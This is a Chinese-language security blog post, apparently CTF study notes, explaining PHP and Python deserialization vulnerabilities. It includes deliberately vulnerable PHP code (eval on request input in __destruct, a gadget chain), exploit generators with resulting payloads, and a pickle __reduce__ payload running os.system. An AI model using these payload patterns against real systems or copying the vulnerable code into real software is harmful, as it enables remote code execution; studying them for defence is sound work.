PHP Python 反序列化

最新推荐文章于 2022-09-02 14:43:41 发布
最新推荐文章于 2022-09-02 14:43:41 发布
阅读量773 收藏 2
点赞数 1
分类专栏: # Web漏洞 文章标签: php python 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noisy_wind/article/details/125788239
版权

1. PHP

1.1 PHP反序列化

PHP 序列化后的基本类型表达:

布尔值(bool):b:value => b:0

整数型(int):i:value => i:1

字符串型(str):s:length:"value"; =>  s:4:"aaaa"

数组型(array):a:<length>:{key, value pairs}; => a:1:{i:1;s:1:"a"}

对象型(object):O:<class_name_length>:

NULL 型:N

最终序列化数据的数据格式如下:
<class_name>:<number_of_properties>:{<properties>};

序列化例子:

class person{
	public $name;
	public $age=19;
	public $sex;
}

通过serialize()函数进行序列化后:
o:6:"person":3:{s:4:"name";N;s:3:"age";i:19;s:3:"sex";N;}

PHP 提供 serialize 和 unserialize 函数将任意类型的数据转换成 string 类型或者从 string 类型还原成任意类型。当 unserialize 函数的参数被用户控制的时候就会形成反序列化漏洞。

与之相关的是 PHP 语法中的类,PHP 的累中可能会包含一些特殊的函数,名为 magic 函数, magic 函数的命名方式是以符号 __ 开头的,比如 __constrcut()__destruct()__toString()__sleep()__wakeup() 等。这些函数在某些情况下会被自动调用。

常见魔法函数及其触发方法:
__construct()  当一个对象创建时被调用

__destruct()  当一个对象销毁时被调用

__toString()  当一个对象被当作一个字符串使用时被调用

__sleep()  在对象在被序列化之前被调用(其返回需要是一个数组)

__wakeup()  反序列化恢复对象前被调用

__call()  当调用对象中不存在的方法时被自动调用

__get()  从不可访问的属性读取数据时被调用

1.2 反序列化漏洞示例

1.2.1 魔术方法中存在可利用的代码

<?php
	class test{
		function __destruct(){
			echo "destruct... <br>";
			eval($_GET['cmd']); // eval 可以将传入的字符串转为命令执行
		}
	}
	unserialize($_GET['u']);
?>

构造反序列化参数 u 的值(exp):

<?php
	class test{}
	$test = new test;
	echo serialize($test);
?>

浏览器访问该 php 文件,得到 payload:
在这里插入图片描述
即:u=O:4:“test”:0:{}

构造命令参数 cmd 的值:
cmd=system(“whoami”)

因此 payload为:u=O:4:"test":0:{}&cmd=system("whoami");

传入值后,代码会执行 system() 函数来调用 whoami 命令:
在这里插入图片描述

1.2.1 魔术方法中没有可利用的代码

在上个例子中,魔术方法中存在 eval($_GET['cmd']); ,因而 cmd 参数可以传入 system() 函数调用命令。而有时没有这种可直接利用的代码,却有调用其他类方法的代码,这时可以寻找其他有相同名称方法的类。

<?php
	class lemon{
		protected $ClassObj;
		function __construct(){
			$this->ClassObj = new normal();
		}
		function __destruct(){
			$this->ClassObj->action();
		}
	}
	
	class normal{
		function action(){
			echo 'hello';
		}
	}
	
	class evil{
		private $data;
		function action(){
			eval($this->data);
		}
	}
	
	unserialize($_GET['d']);
?>
  1. normal 和 evil 有相同的名称的方法,也即 action()。
  2. evil 中,存在 eval() 方法,容易导致任意代码执行。

构造 exp:

<?php
	class lemon{
		protected $ClassObj;
		function __construct(){
			$this->ClassObj = new evil();
		}
	}
	
	class evil{
		private $data = 'phpinfo();';
	}
	echo urlencode(serialize(new lemon()));
?>

我个人的理解:该 exp 中序列化的 class lemon 和 class evil 中重写的部分会在反序列化后覆盖原 php 文件中的代码,而原 php 文件中的其他代码会保留。也即是说,在反序列化后,lemon 会调用 __construct(),而此时会 new evil() 而不再是 new normal()。接着,lemon 会调用 __destruct(),此时,调用的 action() 也就变成了 evil 类中的 action() 。

浏览器访问该 php 文件,得到 payload:
在这里插入图片描述
即 payload:O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

将 payload 传入参数 d,造成执行 phpinfo 代码。
在这里插入图片描述

2. Python

反序列化在每种语言中都有响应的实现方式,Python 也不例外。在反序列化的过程中,由于反序列化库的实现不同,在太相信用户输入的情况下,将用户输入的数据直接传入反序列化库中,就可能导致任意代码执行的问题。Python 中可能存在问题的库由 pickle、cPickle、PyYAML,其中应该重点关注的方法如下:pickle.load()pickle.loads()cPickle.load()cPickle.loads()yaml.load() 。下面重点讨论 pickle 的用法,其他反序列化方法类似。

pickle 中存在 __reduce__ 魔术方法,来决定类如何进行反序列化。 __reduce__ 方法返回一个长度为 2~5 的元组时,将使用该元组的内容将该类的对象进行序列化,其中前两项为必填项。元组的内容的第一项为一个 callable 的对象,第二项为调用 callable 对象时的参数。如下面的例子,将生成在反序列化时执行 os.system("id") 的 payload。在用户对需要进行反序列化的字符串有控制权时,将 payload 传入,就会导致一些问题。例如,将以下反序列化产生的结果直接传入 pickle.loads() ,则会执行 os.system("id")

import pickle
import os

class test(object):
	def __reduce__(self):
		return os.system, ("id",)

payload = pickle.dumps(test())

print(payload)

输出结果:
在这里插入图片描述

References:

《从0到1 CTFer成长之路》
《CTF特训营》

noisy_wind
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python序列中的字符串,列表,字典,类的序列解释
12-22
我们知道现在各大语言都有其序列数据和序列的方式, 比如php的serialize和unserialize函数 Python当然也有,官方库里提供了一个叫做pickle的库 字符串的序列解释 import pickle x = "yuaneuro" y = pickle....
pydifact:python EDIFACT库
05-04
pydifact 一个Python库,用于解析和序列UN / EDIFACT互换。前言这是与Python的。 首先感谢提供的这个很棒的软件。 由于那里的高代码质量,移植就像轻轻松松。 最初代码的所有功劳都归功于他,我只是将代码翻译成...
python对象序列php能读取的格式(即能序列到对象)
weixin_33937499的博客
03-25 200
转载自:http://my.oschina.net/zuoan001/blog/94914 代码如下: #coding:utf-8 # vim: encoding=utf-8:ft=python:et:sw=4:ts=8:sts=4: # # Copyright (c) 2005 Scott Hurring. # Licensed under the GPL (undefined ...
phpserialize ,PHP 中变量序列序列Python 中的实现
volkswageos的专栏
09-27 6746
phpserialize ,是一个PHP 的变量序列序列函数在 Python 的实现。换言之,就是在 Python 语言环境中,借助 phpserialize 可以方便的处理那些在 PHP序列了的文本,将其转变为变量(字符串、数组、整数、对象等),也可以将变量按照
python php 序列,序列序列的详细介绍
weixin_32533375的博客
03-09 278
一、序列序列的概念把对象转换为字节序列的过程称为对象的序列。把字节序列恢复为对象的过程称为对象的序列。对象的序列主要有两种用途:1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;2) 在网络上传送对象的字节序列。在很多应用中,需要对某些对象进行序列,让它们离开内存空间,入住物理硬盘,以便长期保存。比如最常见的是Web服务器中的Session对象,当有 10万用户并发...
python 序列 php,详解Python中的序列序列的使用
weixin_36165569的博客
03-10 186
学习过marshal模块用于序列序列,但marshal的功能比较薄弱,只支持部分内置数据类型的序列/序列,对于用户自定义的类型就无能为力,同时marshal不支持自引用(递归引用)的对象的序列。所以直接使用marshal来序列/序列可能不是很方便。还好,python标准库提供了功能更加强大且更加安全的pickle和cPickle模块。cPickle模块是使用C语言实现的,所以...
python全面代码资源
最新发布
11-15
精选的 Python 框架、库、软件和资源列表。 灵感来自awesome-php。 令人敬畏的Python 管理面板 算法和设计模式 ASGI 服务器 异步编程 音频 认证 构建工具 内置类增强功能 缓存 ChatOps 工具 ...序列
avro:Apache Avro是一个数据序列系统
02-01
Apache Avro:trade_mark: Apache Avro:trade_mark:是一个数据序列系统。 要了解有关Avro的更多信息,请访问我们的网站: 要为Avro做出贡献,请阅读:
PHP序列漏洞学习
qq_62078839的博客
07-14 338
序列是将变量转换为可保存或传输的字符串的过程,序列就是在适当的时候把这个字符串再转成原来的变量使用。序列:序列: 例如: 输出的结果为: 在序列后的结果中的字母标识为: 在这个代码中运用到了 __construct()魔术方法序列魔术方法这里拿PIKACHU靶场一题来举例 这里给了一个例子我们看看源码 这里并没有出现什么危险函数但construct析构函数中有个打印字符串的函数我们可以利用XSS漏洞弹个窗......
php序列后的字符串,php – 布尔值和整数是序列后的字符串
weixin_42510148的博客
03-26 268
我正在使用WordPressupdate_post_meta来保存数组$obj = array('array' => array(1, 'zwei', !!3),'string' => 'abc','bool' => true,'bool2' => false,'integer' => 1,'integer2' => 17);update_post_meta($...
命令执行与序列
songbai220
12-10 762
命令执行与序列 原理 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 &、|、“ 空格”等组合连接实现 只要带参数的地方都可能出现命令执行漏洞 路由器、防火墙、自动运维平台、入侵检测等web管理页面 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 assert system ``(单引号) exec shell_exec pcntl_exec pass
浅谈序列
羽的博客
03-31 220
浅谈序列 前言: 就周二晚上例会,学长讲的序列,开始也是一点都不会啊。所以下去以后自己就 好好看,好好学! 一、首先关注PHP CLASS 类的名称(PHP 4.3.0 新加)。自 PHP 5 起本常量返回该类被定义时的名字(区分大小写)。 在 PHP 4 中该值总是小写字母的。类名包括其被声明的作用区域(例如 Foo\Bar)。注意自 PHP 5.4 起 CLASS 对 trait 也起作用。当用在 trait 方法中时,CLASS 是调用 trait 方法的类的名字。 实例 <?php c
php函数serialize()与unserialize()
larance的挨踢生活
08-31 839
本文转自:http://zxianf.blog.163.com/blog/static/30120701201072443623381/ php函数serialize()与unserialize()说明及案例。想要将已序列的字符串变回 PHP 的值,可使用unserial
生命在于学习——序列
易水哲的博客
09-02 213
序列的一些笔记。
PHP、Java、Python序列的区别
weixin_42974824的博客
08-11 1048
PHP、Java、Python序列的区别
PHP多种序列/序列的方法
wml
05-27 2763
1. serialize和unserialize函数serialize() 函数,把复杂的数据类型压缩到一个字符串中,把变量和它们的值编码成文本形式,这有利于存储或传递 PHP 的值,同时不丢失其类型和结构 unserialize() 函数对单一的已序列的变量进行操作,将其转换回 PHP 的值 例:$stooges = array('Moe','Larry','Curly'); $new =
网络安全-序列漏洞简介、攻击与防御
热门推荐
关注网络安全、云原生安全
03-13 1万+
目录 简介 PHP序列 Python序列 攻击 PHP举例 Python举例 防御 参考 简介 各种语言都有序列漏洞,Java、PHPPython等。序列即将对象转为字节流,便于保存在文件,内存,数据库中;序列即将字节流转为对象,也就是序列的逆过程。 PHP序列 php序列序列函数为serialize、unserialize。 我们尝试对一些类型进行序列 <?php // 字符串类型 $s = "a string"; $serializ
shell序列漏洞
09-14
序列漏洞并不限于特定的编程语言,例如PHP、Java和Python等都存在这样的漏洞。攻击者可以利用这些漏洞来执行各种恶意操作,如代码执行、获取系统权限等。因此,对于开发人员而言,确保对用户输入进行适当的验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值